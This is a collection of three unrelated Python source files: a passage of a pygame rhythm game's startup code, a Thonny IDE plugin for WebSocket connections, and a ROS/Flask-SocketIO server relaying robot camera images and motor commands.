prefs = Preferencies.ImportFromFile(Preferencies.PREFS_FILE)
except Exception as e:
print("An error appeared during user preferencies loading.")
Log(str(e), LogLevel.Error, __name__)
raise
def InitPygame():
try:
pygame.mixer.pre_init(22050, 16, 2, 512)
pygame.mixer.init(allowedchanges=pygame.AUDIO_ALLOW_ANY_CHANGE)
pygame.init()
except Exception as e:
print("An error appeared during pygame initialization.")
Log(str(e), LogLevel.Error, __name__)
raise
def SetGameStats(ar, cs, hp):
try:
#clamp values
ar = Stats.Clamp(ar)
cs = Stats.Clamp(cs)
hp = Stats.Clamp(hp)
#convert stats to actual usable values
return (Stats.GetAR(ar), Stats.GetCS(cs), Stats.GetHP(hp))
except Exception as e:
print("An error appeared during initializing game stats.")
Log(str(e), LogLevel.Error, __name__)
raise
def InitializeWindow(width, height):
"""
Initializes application window
rtype: int, int
returns: pygame.Surface
"""
try:
pygame.mouse.set_visible(prefs.mouseVisible)
if prefs.fullscreen:
win = pygameWindow.CreateWindow(width, height, "Oss!", WindowFlags.FullScreen | WindowFlags.DoubleBuf | WindowFlags.Accelerated)
else:
if prefs.borderless:
win = pygameWindow.CreateWindow(width, height, "Oss!", WindowFlags.BorderLess | WindowFlags.DoubleBuf | WindowFlags.Accelerated)
else:
win = pygameWindow.CreateWindow(width, height,"Oss!", WindowFlags.DoubleBuf | WindowFlags.Accelerated)
Log("Current display driver: {}.".format(pygame.display.get_driver()), LogLevel.Info, __name__)
return win
except Exception as e:
print("An error appeared during window initialization.")
Log(str(e), LogLevel.Error, __name__)
raise
def LoadTextures():
try:
texLoadThreads = [
threading.Thread(name="BgTexLoadThread", target=LoadBackgroundTextures),
threading.Thread(name="CircleTexLoadThread", target=LoadCircleTextures),
threading.Thread(name="InterfaceTexLoadThread", target=LoadInterfaceTextures)]
for thread in texLoadThreads:
thread.start()
for thread in texLoadThreads:
thread.join()
except Exception as e:
print("An error appeared during textures loading.")
Log(str(e), LogLevel.Error, __name__)
raise
def LoadCircleTextures():
radius = int(CS * scale)
for i in range(10):
texName = 'circlefont_' + str(i)
tex = Texture("{}circles/{}.png".format(texPath, i))
tex.ScaleLinear(radius * 2 * scale)
mainResManager.AddTexture(texName, tex)
for i in range(5):
texName = 'circlebg_'+ str(i)
tex = Texture("{}circles/circlebg_{}.png".format(texPath, i))
tex.Scale(radius * 2 * scale)
mainResManager.AddTexture(texName, tex)
circleHit = Texture(texPath + "circles/circlehit.png")
circleHit.Scale(radius* 2 * scale)
mainResManager.AddTexture("hitlayout", circleHit)
def LoadInterfaceTextures():
cursor = Texture(texPath + 'cursor.png')
cursor.Scale(int(32 * prefs.cursorSize * scale))
mainResManager.AddTexture("cursor", cursor)
miss = Texture(texPath + 'miss.png')
miss.Scale(16 * scale)
mainResManager.AddTexture("miss", miss)
setsIcn = Texture(texPath + 'settingsIcon.png')
setsIcn.Scale(48 * scale)
mainResManager.AddTexture('setsIcn', setsIcn)
def LoadBackgroundTextures():
filenames = [name for name in os.listdir(os.path.join(texPath, 'backgrounds')) if os.path.isfile(os.path.join(texPath, 'backgrounds', name))]
try:
filenames.remove("Thumbs.db")
except Exception:
pass
for idx, filename in enumerate(filenames):
texName = 'bg_' + str(idx)
tex = Texture("{}backgrounds/{}".format(texPath, filename))
tex.ScaleLinearXY(int(tex.Width * prefs.bgScaleMultiplier), int(tex.Height * prefs.bgScaleMultiplier))
tex.ScaleLinearXY(prefs.resolution[0], prefs.resolution[1])
tex.Dim(prefs.darkenPercent)
mainResManager.AddTexture(texName, tex)
menuBg = Texture(texPath + 'backgrounds/menu_background.png')
menuBg.ScaleXY(prefs.resolution[0], prefs.resolution[1])
mainResManager.AddTexture("menu_background", menuBg)
def LoadSounds():
try:
for i in range(1, 3):
hitSound = Sound("{}hit{}.wav".format(soundsPath, i))
hitSound.SetVolume(prefs.masterVolume)
mainResManager.AddSound("hit" + str(i), hitSound)
miss = Sound(soundsPath + "miss.wav")
miss.SetVolume(prefs.masterVolume)
mainResManager.AddSound("miss", miss)
btn = Sound(soundsPath + "button_slide.wav")
btn.SetVolume(prefs.masterVolume)
mainResManager.AddSound("button_slide", miss)
except Exception as e:
print("An error appeared during sounds loading.")
Log(str(e), LogLevel.Error, __name__)
raise
def Start(debugMode):
debug.Enable()
#load prefs
LoadPreferencies()
#set scaling factor (for now doesn't work)
global scale
scale = GetScalingFactor(GetScale(prefs.resolution[0], prefs.resolution[1]))
if scale != 1:
scale = 1
print('Initiaizing oss!')
#initialize pygame
InitPygame()
if prefs.lockMouse:
pygame.event.set_grab(True)
#set used SDL events
pygame.event.set_allowed([pygame.QUIT, pygame.KEYDOWN, pygame.MOUSEBUTTONDOWN, pygame.MOUSEMOTION])
#set game stats (AR, CS, HP)
global AR, CS, HP
AR, CS, HP = SetGameStats(AR_raw, CS_raw, HP_raw)
#initialize window
global mainWindow
mainWindow = InitializeWindow(prefs.resolution[0], prefs.resolution[1])
#initialize resources
LoadTextures()
LoadSounds()
mainFont = pygame.font.SysFont('comicsansms', 22 * scale)
mainResManager.AddMainFont(mainFont)
mainResManager.AddFont("comicsansms_48", pygame.font.SysFont('comicsansms', 48 * scale))
mainResManager.AddFont("comicsansms_24", pygame.font.SysFont('comicsansms', 24 * scale))
mainResManager.AddFont("comicsansms_22", pygame.font.SysFont("comicsansms", 22 * scale))
mainResManager.AddFont("comicsansms_21", pygame.font.SysFont("comicsansms", 21 * scale))
mainResManager.AddFont("comicsansms_18", pygame.font.SysFont('comicsansms', 18 * scale))
mainResManager.AddFont("comicsansms_12", pygame.font.SysFont('comicsansms', 12 * scale))
mainResManager.AddFont("comicsansms_10", pygame.font.SysFont("comicsansms", 10 * scale))
#import menu module here to avoid circular import
import menu
#free memory after initialization
FreeMem()
try:
Log("Program loaded in {} seconds.".format(time.perf_counter() - start), LogLevel.Info, __name__)
initialized = True
print('Welcome to Oss!')
m = menu.Menu(mainWindow)
m.Run()
print('Goodbye!')
Log("Program exited after: {} seconds.".format(m.time), LogLevel.Info, __name__)
pygame.mixer.quit()
pygame.quit()
FreeMem()
StopGCThreads()
os.system('pause >NUL')
sys.exit()
except Exception as e:
print('An error appeared. {}'.format(e))
raise
|
thonny-ws.py | from thonny import get_workbench
import websocket
from threading import Thread
from tkinter.simpledialog import askstring
def on_message(ws, message):
"""This method is called if the client received a message.
:param ws: WebSocketApp object
:param message: message object represented as string
Returns:
None
"""
print("Message from " + ws.url + " received: " + message)
def on_error(ws, error):
"""This method is called if the client received an error.
:param ws: WebSocketApp object
:param error: error object
Returns:
None
"""
print("Error from " + ws.url + " received: " + error)
def on_close(ws):
"""This method is called after the connection is closed.
:param ws: WebSocketApp object
Returns:
None
"""
print("Connection closed to server: " + ws.url)
def on_open(ws):
"""This method is called after the connection is opened.
:param ws: WebSocketApp object
Returns:
None
"""
print("Connection opened to server: " + ws.url)
def run_in_background():
"""This method has to be called in a new thread because it blocks the current
thread. It will listen for messages from the latest added WebSocketApp object.
Returns:
None
"""
wsList = Singleton.getInstance().get_wsList()
ws = wsList[len(wsList) - 1]
ws.run_forever()
class Singleton:
"""This Singleton class is needed because the list of WebSocketApp objects is shared.
__instance: The current instance of this class.
"""
__instance = None
@staticmethod
def getInstance():
"""This is an unmodified Singleton.getInstance() method. It will create a new
instance only once.
Returns:
Nested Singleton object with the list of WebSocketApp objects
"""
if Singleton.__instance == None:
Singleton()
return Singleton.__instance
def __init__(self):
"""This is an unmodified Singleton constructor. The singleton instance will
contain an empty list.
"""
if Singleton.__instance != None:
raise Exception("This class is a singleton!")
else:
self.wsList = []
Singleton.__instance = self
def get_wsList(self):
"""This method gets the list of WebSocketApp objects.
Returns:
list of WebSocketApp objects
"""
return self.wsList
def add_ws(self, ws):
"""This method adds a WebSocketApp object to the list.
:param ws: WebSocketApp object
Returns:
None
"""
self.wsList.append(ws)
def remove_ws(self, server_address):
"""This method removes a WebSocketApp object with a given server address from
the list.
:param server_address: server address represented as a string
Returns:
None
"""
for ws in self.wsList:
if ws.url == server_address:
self.wsList.remove(ws)
ws.close()
return
def send_message(self, server_address, message):
"""This method sends a message to a server with the given server address and
message.
:param server_address: server address represented as a string
:param message: message represented as a string
Returns:
None
"""
for ws in self.wsList:
if ws.url == server_address:
ws.send(message)
print("Sent " + message + " to " + ws.url)
return
print(
"Message can't be sent to "
+ server_address
+ " as there is no established connection."
)
def add_ws_server():
"""This method gets called if the "Add WS Server" command is clicked in the "tools"
menu. It will create a WebSocketApp object with a given server_address and then get
the Singleton instance. After that, it will create a new thread and call the
"run_in_background" method.
Returns:
None
"""
server_address = askstring("Websocket", "Which server would you like to add?")
ws = websocket.WebSocketApp(
server_address, on_message=on_message, on_error=on_error, on_close=on_close,
)
ws.on_open = on_open
Singleton.getInstance().add_ws(ws)
t = Thread(target=run_in_background)
t.daemon = True
t.start()
def close_ws_server():
"""This method gets called if the "Close WS Server connection" command is clicked
in the "tools" menu. It will get the Singleton instance and call the remove_ws
method with the given server address.
Returns:
None
"""
server_address = askstring("Websocket", "Which server connection should be closed?")
Singleton.getInstance().remove_ws(server_address)
def send_message():
"""This method gets called if the "Send Message" command is clicked
in the "tools" menu. It will get the Singleton instance and call the send_message
method with the given server address and message.
Returns:
None
"""
server_address = askstring("Websocket", "Which server would you like to message?")
message = askstring("Message", "What is your message?")
Singleton.getInstance().send_message(server_address, message)
def load_plugin():
"""This method gets called if this plugin is in the PYTHONPATH environment variable
upon starting thonny. It will add the needed commands to the thonny workbench.
Returns:
None
"""
# This method enables DEBUG messages
websocket.enableTrace(True)
get_workbench().add_command(
command_id="ws_add",
menu_name="tools",
command_label="Add WS Server",
handler=add_ws_server,
)
get_workbench().add_command(
command_id="ws_remove",
menu_name="tools",
command_label="Close WS Server connection",
handler=close_ws_server,
)
get_workbench().add_command(
command_id="ws_remove",
menu_name="tools",
command_label="Send Message",
handler=send_message,
)
|
main_server.py | #!/usr/bin/env python3
import rospy
import threading
import signal
from flask import Flask, render_template
from flask_socketio import SocketIO, send, emit
from publishers.move_pub import MovePub
from subscribers.image_sub import ImageSub
HOST_IP = "0.0.0.0"
HOST_PORT = 4040
class SubInfo:
def __init__(self, ros_topic, sio_route, sio_id, sub):
self.ros_topic = ros_topic
self.sio_route = sio_route
self.sio_id = sio_id
self.sub = sub
class PubInfo:
def __init__(self, ros_topic, pub):
self.ros_topic = ros_topic
self.pub = pub
app = Flask(__name__)
sio = SocketIO(app, cors_allowed_origins="*", async_mode='gevent')
# Maps socketio image id to ROS topic name
image_handles = ['camera_stream', 'img_sub']
# aux storage to make sure subscriber objects aren't garbage collected
subscribers = {
'camera_h': SubInfo('/nautilus/cameras/stream', 'Image Display', 'camera_stream', None),
'img_h': SubInfo('/image/distribute', 'Image Display', 'img_sub', None),
}
# Map of handles to rospy pub objects
publishers = {
'move_h': PubInfo('/nautilus/motors/commands', None),
}
@sio.on("Get IDs")
def send_image_id():
sio.emit("IDs", {'ids': image_handles}, broadcast=True)
@sio.on("Send State")
def send_move_state(data):
publishers['move_h'].pub.update_state(data)
def shutdown_server(signum, frame):
rospy.loginfo("Shutting down main server")
sio.stop()
exit(signal.SIGTERM)
if __name__ == '__main__':
""" Sets up rospy and starts servers """
rospy.loginfo("main server is running")
rospy.init_node('surface', log_level=rospy.DEBUG)
# Register our subscribers and publishers
for handle in ['camera_h', 'img_h']:
subinfo = subscribers[handle]
subinfo.sub = ImageSub(
subinfo.ros_topic, subinfo.sio_route, subinfo.sio_id, sio)
publishers['move_h'].pub = MovePub(publishers['move_h'].ros_topic)
# Define a way to exit gracefully
signal.signal(signal.SIGINT, shutdown_server)
# Start the ROS services and sio server
threading.Thread(target=rospy.spin, daemon=True).start()
sio.run(app, host=HOST_IP, port=HOST_PORT)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.